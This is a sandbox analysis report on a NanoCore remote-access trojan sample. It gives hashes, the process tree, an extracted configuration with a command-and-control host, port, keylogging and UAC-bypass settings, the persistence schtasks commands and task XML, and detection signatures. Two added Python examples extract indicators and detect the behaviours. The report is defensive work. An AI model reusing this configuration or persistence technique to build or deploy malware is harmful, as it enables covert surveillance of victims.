
Analysis Report nanocore.exe

Overview

General Information

Sample Name:nanocore.exe
Analysis ID:384377
MD5:08803cc817d8b1046a964af11685b15c
SHA1:8d76cc9e4e21f90aaa0d2a8e9dd88ccb03349f29
SHA256:00343ef156007c41a76abebe2b0304aacc7e2b12e0d30ea476ecf8c847a54dfc
Tags:Nanocore

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Hides that the sample has been downloaded from the Internet (zone.identifier)
Maps a DLL or memory area into another process
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • nanocore.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\nanocore.exe' MD5: 08803CC817D8B1046A964AF11685B15C)
    • nanocore.exe (PID: 7104 cmdline: 'C:\Users\user\Desktop\nanocore.exe' MD5: 08803CC817D8B1046A964AF11685B15C)
      • schtasks.exe (PID: 5800 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5108 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • nanocore.exe (PID: 4108 cmdline: C:\Users\user\Desktop\nanocore.exe 0 MD5: 08803CC817D8B1046A964AF11685B15C)
    • nanocore.exe (PID: 5904 cmdline: C:\Users\user\Desktop\nanocore.exe 0 MD5: 08803CC817D8B1046A964AF11685B15C)
  • dhcpmon.exe (PID: 5752 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 08803CC817D8B1046A964AF11685B15C)
    • dhcpmon.exe (PID: 6152 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 08803CC817D8B1046A964AF11685B15C)
  • dhcpmon.exe (PID: 6724 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 08803CC817D8B1046A964AF11685B15C)
    • dhcpmon.exe (PID: 6704 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 08803CC817D8B1046A964AF11685B15C)
  • cleanup

Malware Configuration

Threatname: NanoCore

Extracted configuration (one field per line, as returned by the Joe Sandbox extractor):

Version: 1.2.2.0
Mutex: bee718f3-e47a-44f8-955e-2fe2c6c0
Group: Default
Domain1: chinomso.duckdns.org
Domain2: chinomso.duckdns.org
Port: 7688
KeyboardLogging: Enable
RunOnStartup: Enable
RequestElevation: Enable
BypassUAC: Enable
ClearZoneIdentifier: Enable
ClearAccessControl: Disable
SetCriticalProcess: Disable
PreventSystemSleep: Enable
ActivateAwayMode: Disable
EnableDebugMode: Disable
RunDelay: 0
ConnectDelay: 4000
RestartDelay: 5000
TimeoutInterval: 5000
KeepAliveTimeout: 30000
MutexTimeout: 5000
LanTimeout: 2500
WanTimeout: 8000
BufferSize: ffff0000
MaxPacketSize: 0000a000
GCThreshold: 0000a000
UseCustomDNS: Enable
PrimaryDNSServer: chinomso.duckdns.org
BackupDNSServer: chinomso.duckdns.orgAMC9Avo9uFWUE1JbxpU=
BypassUserAccountControlData: scheduled-task XML, reproduced below with the JSON escaping removed (the extractor's copy ends in a truncated closing tag, as shown)

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>false</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>4</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"#EXECUTABLEPATH"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task
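As an added worked example (not part of the Joe Sandbox report), the Python below triages the configuration above the way a responder would: it pulls the C2 indicators, lists the client options that change the response (elevation, keylogging, mark-of-the-web removal), validates each hostname (the extractor's BackupDNSServer value carries trailing base64-looking bytes and is not a usable indicator), tests for a dynamic-DNS zone, and scans the embedded scheduled-task XML for RunLevel HighestAvailable. CONFIG_JSON is copied from the extractor output with the task's Settings block omitted for brevity; the dynamic-DNS suffix list and the risky-setting list are this example's own assumptions, and the XML is scanned with regular expressions because the extracted copy is not well-formed.

```python
import json
import re

# Copied from the report's extractor output. The task XML's <Settings> block is
# omitted for brevity and the closing tag is truncated exactly as the extractor
# returned it, so an XML parser would reject this string.
CONFIG_JSON = r'''{"Version": "1.2.2.0", "Mutex": "bee718f3-e47a-44f8-955e-2fe2c6c0",
 "Group": "Default", "Domain1": "chinomso.duckdns.org", "Domain2": "chinomso.duckdns.org",
 "Port": 7688, "KeyboardLogging": "Enable", "RunOnStartup": "Enable",
 "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable",
 "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable",
 "UseCustomDNS": "Enable", "PrimaryDNSServer": "chinomso.duckdns.org",
 "BackupDNSServer": "chinomso.duckdns.orgAMC9Avo9uFWUE1JbxpU=",
 "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}'''

# RFC 1123 style hostname: dot-separated labels, alphabetic TLD.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I)
# Assumption: a short illustrative list; load a full one in real use.
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.com", "no-ip.org", "ddns.net", "hopto.org")
# Assumption: the client options that matter most for containment.
RISKY_SETTINGS = ("BypassUAC", "RequestElevation", "KeyboardLogging",
                  "ClearZoneIdentifier", "ClearAccessControl", "SetCriticalProcess")


def is_dynamic_dns(host):
    """True when host is, or is a subdomain of, a listed dynamic-DNS zone."""
    h = host.lower()
    return any(h == s or h.endswith("." + s) for s in DYNDNS_SUFFIXES)


def xml_tag(xml, name):
    """Return the text of the first <name>...</name> element, or None."""
    m = re.search(rf"<{name}>(.*?)</{name}>", xml, re.S)
    return m.group(1) if m else None


def triage(config_json):
    """Turn the raw extractor JSON into indicators and response-relevant flags."""
    cfg = json.loads(config_json)
    hosts = {}
    for key in ("Domain1", "Domain2", "PrimaryDNSServer", "BackupDNSServer"):
        val = cfg.get(key, "")
        hosts[key] = {"value": val,
                      "valid_hostname": bool(HOSTNAME_RE.match(val)),
                      "dynamic_dns": is_dynamic_dns(val)}
    # Only syntactically valid names become indicators; the over-read
    # BackupDNSServer value is reported but not promoted to an IOC.
    c2_hosts = sorted({h["value"] for h in hosts.values() if h["valid_hostname"]})
    task_xml = cfg.get("BypassUserAccountControlData", "")
    run_level = xml_tag(task_xml, "RunLevel")
    return {
        "c2": [f"{h}:{cfg['Port']}" for h in c2_hosts],
        "mutex": cfg.get("Mutex"),
        "hosts": hosts,
        "risky_enabled": [k for k in RISKY_SETTINGS if cfg.get(k) == "Enable"],
        "task_run_level": run_level,
        "task_command": xml_tag(task_xml, "Command"),
        # A task with RunLevel HighestAvailable runs with the highest privileges
        # the account holds; this is the task the BypassUAC option registers.
        "task_elevates": run_level == "HighestAvailable",
    }


if __name__ == "__main__":
    for key, value in triage(CONFIG_JSON).items():
        print(f"{key}: {value}")
```

The mutex and the C2 host:port pair are the two indicators worth pushing to endpoint and network controls immediately; the hostname check is there because extractor output is best-effort and a garbage value pushed as a block rule is a false positive waiting to happen.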

Yara Overview

Memory Dumps

Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp
Rule: Nanocore_RAT_Gen_2 (Detects the Nanocore RAT; author: Florian Roth)
  • 0x215e5:$x1: NanoCore.ClientPluginHost
  • 0x21622:$x2: IClientNetworkHost
  • 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp
Rule: Nanocore_RAT_Feb18_1 (Detects Nanocore RAT; author: Florian Roth)
  • 0x2135d:$x1: NanoCore Client.exe
  • 0x215e5:$x2: NanoCore.ClientPluginHost
  • 0x22c1e:$s1: PluginCommand
  • 0x22c12:$s2: FileCommand
  • 0x23ac3:$s3: PipeExists
  • 0x2987a:$s4: PipeCreated
  • 0x2160f:$s5: IClientLoggingHost

Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp
Rule: JoeSecurity_Nanocore (Yara detected Nanocore RAT; author: Joe Security)
  (no strings listed)

Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp
Rule: NanoCore (description: unknown; author: Kevin Breen <kevin@techanarchy.net>)
  • 0x2134d:$a: NanoCore
  • 0x2135d:$a: NanoCore
  • 0x21591:$a: NanoCore
  • 0x215a5:$a: NanoCore
  • 0x215e5:$a: NanoCore
  • 0x213ac:$b: ClientPlugin
  • 0x215ae:$b: ClientPlugin
  • 0x215ee:$b: ClientPlugin
  • 0x214d3:$c: ProjectData
  • 0x21eda:$d: DESCrypto
  • 0x298a6:$e: KeepAlive
  • 0x27894:$g: LogClientMessage
  • 0x23a8f:$i: get_Connected
  • 0x22210:$j: #=q
  • 0x22240:$j: #=q
  • 0x2225c:$j: #=q
  • 0x2228c:$j: #=q
  • 0x222a8:$j: #=q
  • 0x222c4:$j: #=q
  • 0x222f4:$j: #=q
  • 0x22310:$j: #=q

Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp
Rule: Nanocore_RAT_Gen_2 (Detects the Nanocore RAT; author: Florian Roth)
  • 0x2db9d:$x1: NanoCore.ClientPluginHost
  • 0x2dbda:$x2: IClientNetworkHost
  • 0x3170d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

(132 further memory-dump matches are not included in this extract.)

Unpacked PEs

Source: 10.1.nanocore.exe.415058.1.unpack
Rule: Nanocore_RAT_Gen_2 (Detects the Nanocore RAT; author: Florian Roth)
  • 0xe38d:$x1: NanoCore.ClientPluginHost
  • 0xe3ca:$x2: IClientNetworkHost
  • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

Source: 10.1.nanocore.exe.415058.1.unpack
Rule: Nanocore_RAT_Feb18_1 (Detects Nanocore RAT; author: Florian Roth)
  • 0xe105:$x1: NanoCore Client.exe
  • 0xe38d:$x2: NanoCore.ClientPluginHost
  • 0xf9c6:$s1: PluginCommand
  • 0xf9ba:$s2: FileCommand
  • 0x1086b:$s3: PipeExists
  • 0x16622:$s4: PipeCreated
  • 0xe3b7:$s5: IClientLoggingHost

Source: 10.1.nanocore.exe.415058.1.unpack
Rule: JoeSecurity_Nanocore (Yara detected Nanocore RAT; author: Joe Security)
  (no strings listed)

Source: 10.1.nanocore.exe.415058.1.unpack
Rule: NanoCore (description: unknown; author: Kevin Breen <kevin@techanarchy.net>)
  • 0xe0f5:$a: NanoCore
  • 0xe105:$a: NanoCore
  • 0xe339:$a: NanoCore
  • 0xe34d:$a: NanoCore
  • 0xe38d:$a: NanoCore
  • 0xe154:$b: ClientPlugin
  • 0xe356:$b: ClientPlugin
  • 0xe396:$b: ClientPlugin
  • 0xe27b:$c: ProjectData
  • 0xec82:$d: DESCrypto
  • 0x1664e:$e: KeepAlive
  • 0x1463c:$g: LogClientMessage
  • 0x10837:$i: get_Connected
  • 0xefb8:$j: #=q
  • 0xefe8:$j: #=q
  • 0xf004:$j: #=q
  • 0xf034:$j: #=q
  • 0xf050:$j: #=q
  • 0xf06c:$j: #=q
  • 0xf09c:$j: #=q
  • 0xf0b8:$j: #=q

Source: 11.2.dhcpmon.exe.415058.1.unpack
Rule: Nanocore_RAT_Gen_2 (Detects the Nanocore RAT; author: Florian Roth)
  • 0xe38d:$x1: NanoCore.ClientPluginHost
  • 0xe3ca:$x2: IClientNetworkHost
  • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

(352 further unpacked-PE matches are not included in this extract.)

Sigma Overview

System Summary:

Sigma detected: NanoCore (author: Joe Security)
Source: File created
  EventID: 11
  Image: C:\Users\user\Desktop\nanocore.exe
  ProcessId: 7104
  TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Scheduled temp file as task from temp location (author: Joe Security)
Source: Process started
  Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'
  CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'
  CommandLine|base64offset|contains: j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: 'C:\Users\user\Desktop\nanocore.exe'
  ParentImage: C:\Users\user\Desktop\nanocore.exe
  ParentProcessId: 7104
  ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'
  ProcessId: 5800
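As an added example (not part of the Joe Sandbox report), the Python below runs the logic of the two Sigma hits above, plus the parent-spawns-its-own-image shape visible in the Startup tree, over constructed Sysmon-style events modelled on this report's process tree. The event field names, the Temp-directory pattern and the event list itself are this example's own assumptions, not sandbox output.

```python
import re

# Directories that schtasks /xml should not normally be importing a task from.
TEMP_DIR_RE = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
# /tn and /xml values, quoted with " or ' (Joe Sandbox renders " as ') or bare.
ARG_RE = re.compile(r"""/(tn|xml)\s+(?:["']([^"']+)["']|(\S+))""", re.I)
# NanoCore's run.dat under a GUID-named folder in Roaming (the first Sigma hit).
GUID_RUN_DAT_RE = re.compile(
    r"\\AppData\\Roaming\\[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}\\run\.dat$", re.I)

# Constructed from the report's Startup tree and Sigma hits; not live telemetry.
# id 1 = process create, id 11 = file create (Sysmon event numbering).
EVENTS = [
    {"id": 1, "pid": 7064, "ppid": 1234, "image": r"C:\Users\user\Desktop\nanocore.exe",
     "cmd": r"'C:\Users\user\Desktop\nanocore.exe'"},
    {"id": 1, "pid": 7104, "ppid": 7064, "image": r"C:\Users\user\Desktop\nanocore.exe",
     "cmd": r"'C:\Users\user\Desktop\nanocore.exe'"},
    {"id": 11, "pid": 7104, "image": r"C:\Users\user\Desktop\nanocore.exe",
     "target": r"C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat"},
    {"id": 1, "pid": 5800, "ppid": 7104, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r"'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'"},
    {"id": 1, "pid": 5108, "ppid": 7104, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r"'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'"},
    # Benign control: an administrator importing a task from a non-temp location.
    {"id": 1, "pid": 9001, "ppid": 4321, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /tn "Backup" /xml "C:\ProgramData\backup\task.xml"'},
]


def schtasks_args(cmd):
    """Return {'tn': ..., 'xml': ...} parsed from a schtasks command line."""
    return {key.lower(): (quoted or bare) for key, quoted, bare in ARG_RE.findall(cmd)}


def detect(events):
    """Return (rule, pid, detail) tuples for the three behaviours in the report."""
    alerts = []
    image_by_pid = {e["pid"]: e["image"] for e in events if e["id"] == 1}
    for e in events:
        if e["id"] == 1:
            cmd = e["cmd"]
            if "schtasks" in e["image"].lower() and "/create" in cmd.lower():
                args = schtasks_args(cmd)
                xml_path = args.get("xml", "")
                if TEMP_DIR_RE.search(xml_path):
                    alerts.append(("task_xml_from_temp", e["pid"],
                                   f"task {args.get('tn')!r} from {xml_path}"))
            # A parent launching a second copy of its own image is the shape of
            # the suspended-process injection this report flags.
            parent_image = image_by_pid.get(e["ppid"])
            if parent_image and parent_image.lower() == e["image"].lower():
                alerts.append(("self_image_child", e["pid"], f"parent pid {e['ppid']}"))
        elif e["id"] == 11 and GUID_RUN_DAT_RE.search(e["target"]):
            alerts.append(("guid_dir_run_dat", e["pid"], e["target"]))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:20} pid={pid:<6} {detail}")
```

The task-name check is deliberately absent: "DHCP Monitor" is whatever this build's operator typed, and a rule keyed on it would miss the next sample. The Temp-path and GUID-folder patterns survive rebuilds because they come from the client's installer logic rather than its configuration.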

Signature Overview

AV Detection:

Found malware configuration
Source: 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmp, Malware Configuration Extractor: NanoCore (the extracted configuration is listed in full under Malware Configuration above)
Multi AV Scanner detection for domain / URL
Source: chinomso.duckdns.org, VirusTotal detection: 9%
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, ReversingLabs detection: 34%
Source: C:\Users\user\AppData\Local\Temp\nse444B.tmp\4rmzuajr4dtt.dll, ReversingLabs detection: 24%
Source: C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll, ReversingLabs detection: 24%
Source: C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll, ReversingLabs detection: 24%
Source: C:\Users\user\AppData\Local\Temp\nsq6D11.tmp\4rmzuajr4dtt.dll, ReversingLabs detection: 24%
Multi AV Scanner detection for submitted file
Source: nanocore.exe, VirusTotal detection: 21%
Source: nanocore.exe, ReversingLabs detection: 34%
Yara detected Nanocore RAT
Source: Yara match. File sources of type MEMORY (memory dumps):
  • 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp
  • 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp
  • 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp
  • 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
  • 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp
  • 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp
  • 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
  • 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp
  • 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp
  • 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp
  • 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp
  • 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp
  • 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp
  • 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp
  • 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp
  • 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp
  • 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp
  • 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp
  • 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp
  • 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp
  • 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp
  • 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp
  • 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp
  • 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp
  • 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp
  • 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp
  • 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp
  • 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp
  • 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp
  • 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
  • 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp
  • 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp
  • 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp
  • 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp
Process memory spaces (type MEMORY):
  • dhcpmon.exe PID: 5752
  • dhcpmon.exe PID: 6152
  • nanocore.exe PID: 7064
  • nanocore.exe PID: 7104
  • nanocore.exe PID: 4108
  • nanocore.exe PID: 5904
  • dhcpmon.exe PID: 6724
  • dhcpmon.exe PID: 6704
File sources of type UNPACKEDPE:
  • 10.1.nanocore.exe.415058.1.unpack
  • 11.2.dhcpmon.exe.415058.1.unpack
  • 1.2.nanocore.exe.1eed1458.5.unpack
  • 10.2.nanocore.exe.696a10.2.raw.unpack
  • 11.2.dhcpmon.exe.33531ec.6.raw.unpack
  • 11.2.dhcpmon.exe.4920000.9.unpack
  • 8.2.nanocore.exe.1eec0000.5.unpack
  • 11.2.dhcpmon.exe.32d5530.4.unpack
  • 1.2.nanocore.exe.1eec0000.4.unpack
  • 13.2.dhcpmon.exe.4910000.8.raw.unpack
  • 9.2.dhcpmon.exe.1ed81458.5.raw.unpack
  • 13.2.dhcpmon.exe.400000.1.unpack
  • 13.1.dhcpmon.exe.415058.1.unpack
  • 13.2.dhcpmon.exe.4910000.8.unpack
  • 8.2.nanocore.exe.1eec0000.5.raw.unpack
  • 13.2.dhcpmon.exe.415058.0.raw.unpack
  • 10.2.nanocore.exe.4940000.8.raw.unpack
  • 10.2.nanocore.exe.400000.0.unpack
  • 11.2.dhcpmon.exe.33531ec.6.unpack
  • 13.2.dhcpmon.exe.415058.0.unpack
  • 13.2.dhcpmon.exe.33f5530.4.raw.unpack
  • 10.2.nanocore.exe.49c0000.9.unpack
  • 10.1.nanocore.exe.415058.1.raw.unpack
  • 2.2.nanocore.exe.58b4629.13.raw.unpack
  • 10.2.nanocore.exe.400000.0.raw.unpack
  • 2.2.nanocore.exe.400000.0.unpack
  • 2.2.nanocore.exe.4a90000.8.unpack
  • 13.2.dhcpmon.exe.4fa0000.9.unpack
  • 13.3.dhcpmon.exe.7130f0.0.raw.unpack
  • 2.2.nanocore.exe.58b0000.12.unpack
  • 2.2.nanocore.exe.4970000.7.raw.unpack
  • 10.2.nanocore.exe.34c5530.4.unpack
  • 2.1.nanocore.exe.400000.0.unpack
  • 11.2.dhcpmon.exe.47f0000.8.raw.unpack
  • 9.2.dhcpmon.exe.1ed70000.4.raw.unpack
  • 8.2.nanocore.exe.1eed1458.4.raw.unpack
  • 2.2.nanocore.exe.400000.0.raw.unpack
  • 13.2.dhcpmon.exe.346e3b6.7.raw.unpack
  • 2.2.nanocore.exe.35b7815.6.raw.unpack
  • 11.2.dhcpmon.exe.400000.0.raw.unpack
  • 10.2.nanocore.exe.34c5530.4.raw.unpack
  • 9.2.dhcpmon.exe.1ed70000.4.unpack
  • 11.2.dhcpmon.exe.715c48.2.unpack
  • 13.2.dhcpmon.exe.3477815.5.raw.unpack
  • 1.2.nanocore.exe.1eed1458.5.raw.unpack
  • 2.2.nanocore.exe.415058.1.raw.unpack
  • 10.2.nanocore.exe.3547815.5.raw.unpack
  • 11.2.dhcpmon.exe.3357815.5.raw.unpack
  • 11.2.dhcpmon.exe.415058.1.raw.unpack
  • 10.2.nanocore.exe.696a10.2.unpack
  • 2.2.nanocore.exe.35b31ec.4.raw.unpack
  • 2.1.nanocore.exe.415058.1.unpack
  • 13.2.dhcpmon.exe.33f5530.4.unpack
  • 11.2.dhcpmon.exe.32d5530.4.raw.unpack
  • 2.2.nanocore.exe.5b31b8.2.unpack
  • 13.3.dhcpmon.exe.7130f0.0.unpack
  • 13.2.dhcpmon.exe.34731ec.6.raw.unpack
  • 13.1.dhcpmon.exe.415058.1.raw.unpack
  • 2.2.nanocore.exe.415058.1.unpack
  • 10.2.nanocore.exe.4940000.8.unpack
  • 13.2.dhcpmon.exe.400000.1.raw.unpack
  • 13.2.dhcpmon.exe.7130f0.2.unpack
  • 2.2.nanocore.exe.4970000.7.unpack
  • 10.2.nanocore.exe.35431ec.6.raw.unpack
  • 11.1.dhcpmon.exe.400000.0.unpack
  • 1.2.nanocore.exe.1eec0000.4.raw.unpack
  • 2.2.nanocore.exe.35b31ec.4.unpack
  • 11.2.dhcpmon.exe.47f0000.8.unpack
  • 9.2.dhcpmon.exe.1ed81458.5.unpack
  • 2.2.nanocore.exe.35ae3b6.5.raw.unpack
  • 2.1.nanocore.exe.415058.1.raw.unpack
  • 10.2.nanocore.exe.415058.1.raw.unpack
  • 8.2.nanocore.exe.1eed1458.4.unpack
  • 10.2.nanocore.exe.35431ec.6.unpack
  • 2.2.nanocore.exe.58b0000.12.raw.unpack
  • 12.2.dhcpmon.exe.1ed91458.5.unpack
  • 12.2.dhcpmon.exe.1ed80000.4.raw.unpack
  • 12.2.dhcpmon.exe.1ed80000.4.unpack
  • 13.2.dhcpmon.exe.7130f0.2.raw.unpack
  • 11.2.dhcpmon.exe.400000.0.unpack
  • 10.2.nanocore.exe.415058.1.unpack
  • 10.1.nanocore.exe.400000.0.unpack
  • 13.1.dhcpmon.exe.400000.0.unpack
  • 10.2.nanocore.exe.353e3b6.7.raw.unpack
  • 13.2.dhcpmon.exe.34731ec.6.unpack
  • 11.2.dhcpmon.exe.334e3b6.7.raw.unpack
  • 12.2.dhcpmon.exe.1ed91458.5.raw.unpack
  • 11.1.dhcpmon.exe.415058.1.raw.unpack
  • 11.2.dhcpmon.exe.715c48.2.raw.unpack
  • 11.1.dhcpmon.exe.415058.1.unpack
  • 2.2.nanocore.exe.5b31b8.2.raw.unpack
Antivirus or Machine Learning detection for unpacked file
Source: 11.2.dhcpmon.exe.4920000.9.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 13.2.dhcpmon.exe.400000.1.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 10.2.nanocore.exe.400000.0.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 10.2.nanocore.exe.49c0000.9.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 2.2.nanocore.exe.400000.0.unpack, Avira label: TR/Dropper.MSIL.Gen7
